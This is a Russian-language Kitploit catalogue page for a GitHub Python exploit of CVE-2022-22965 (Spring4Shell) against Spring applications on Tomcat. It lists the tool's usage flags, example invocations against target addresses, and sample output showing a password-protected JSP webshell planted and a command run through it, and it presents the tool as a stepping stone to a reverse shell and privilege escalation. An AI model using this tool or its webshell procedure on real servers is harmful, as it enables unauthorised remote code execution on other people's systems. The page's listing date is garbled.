Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22965 — spring4shell | CVE-2022-22965 | Kitploit
Инструменты/GitHubGitHub/p1ckzi/cve-2022-22965
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubp1ckzi/cve-2022-22965

CVE-2022-22965

spring4shell | CVE-2022-22965

Репозиторий
23724 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

spring4shell ⭐

реализация CVE-2022-22965 на Python, предоставляющая пользователю подсказку в стиле SSH-сессии.
Скрипт разработан так, чтобы быть простым для понимания и выполнения, с учётом читаемости и доступности — в зависимости от выбора пользователя. Предназначен для эксплуатации уязвимости на серверах Tomcat. Поле fileDateFormat на сервере будет установлено и сброшено в рамках работы скрипта, что позволяет запускать эксплойт многократно. Возможна необходимость очистки.

эксплойт — CVE-2022-22965 ❗

Уязвимость обнаружена в Java Spring Framework до версии 5.2, а также в версиях 5.3.0–17 и 5.2.0–19, работающих на версии Java Development Kit не ниже 9. Подробнее:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

предварительные требования ✔

Для работы эксплойта требуются модули requests и BeautifulSoup. Их можно установить с помощью:
pip3 install bs4
pip3 install requests
Все остальные модули встроены в Python3.

использование ℹ

Для работы скрипта требуется только URL уязвимого сервера. Однако есть и другие флаги для удобства и т.д.
Вывод --help:

root@kitploit:~
usage: spring4shell_v3.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] [-a] [-n] address

spring4shell_v3.py exploits an RCE vulnerability in
applications running spring core java framework.

positional arguments:
  address               ip/hostname, port, sub-directories to the vulnerable spring core framework on tomcat

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        name of the file to create and upload
  -p PASSWORD, --password PASSWORD
                        password to protect the uploaded shell
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file
  -a, --accessible      turns off features which may negatively affect screen readers
  -n, --no-colour       removes colour output

example:
        spring4shell_v3.py http://10.10.10.10/
        spring4shell_v3.py http://hostname:8080/ -p 'password123'
        spring4shell_v3.py http://10.10.10.10/subdir/ -a -f 'jsp-shell'

Скачать инструмент

пример вывода:

root@kitploit:~
./spring4shell http://spring-vuln.local

                /           /  |      /         / /                                                            
 ___  ___  ___    ___  ___ (___| ___ (___  ___ ( (                                                             
|___ |   )|   )| |   )|   )    )|___ |   )|___)| |                                                             
 __/ |__/ |    | |  / |__/    /  __/ |  / |__  | |                                                             
     |                __/                                                                                      
CVE-2022-22965.
[i] attempting to change tomcat log variables.
[+] log variables set successfully.
[+] attempting to change tomcat log location variables.
[+] log successfully modified.
[i] waiting for tomcat changes.
[i] sending the webshell.
[i] resetting the log variables.
[i] shell location:
[i] http://spring-vuln.local/20df2b10c787d5ae.jsp?pwd=bd72c5e8&cmd=whoami
[i] or run commands here. type 'exit' to quit.
spring4shell:[email protected] $ whoami
service

spring4shell:[email protected] $

ограничения ⚠

Само собой разумеется, что скрипт не предоставляет пользователю полноценную оболочку, но служит платформой для получения полноценной обратной оболочки, повышения привилегий и т.д. на целевой системе.
Скрипт пытается определить пользователя/службу, под которыми работает уязвимый сервер, чтобы использовать это в псевдокомандной строке программы, хотя это не всегда надёжно.

примечания 📝

Скрипт в основном был написан как упражнение по написанию скриптов на Python для одного эксплойта с учётом как читаемости, так и доступности. Предназначен для простоты использования и понимания. Пытается обрабатывать распространённые исключения.

благодарности 👍

https://skerritt.blog/a11y/ — реализация доступности.